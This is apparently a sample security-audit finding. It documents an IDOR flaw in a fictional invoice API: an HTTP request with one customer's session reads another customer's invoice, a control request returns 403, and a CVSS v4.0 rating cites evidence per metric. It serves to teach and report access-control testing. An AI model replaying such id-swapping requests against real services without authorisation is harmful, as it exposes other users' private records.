IDOR: any customer can read another customer’s invoice
Sample findingAttack · role customer-b200 OK
GET /api/invoices/48213 Cookie: session=‹customer-b› → 200 · application/json · 1.2 kB { "invoice": 48213, "owner": "customer-a@acme.test", "total": "4,980.00" }
Control · same session403 Forbidden
GET /api/invoices/00000 Cookie: session=‹customer-b› → 403 · application/json { "error": "forbidden" } # customer-a's own session → same body
Rating · CVSS v4.0 · evidence cited per metric7.1 high
- PR:L
- any logged-in customer session
- VC:H
- response leaks another owner’s invoice
- VI:N
- no write observed on this endpoint
- AT:N
- sequential ids, no precondition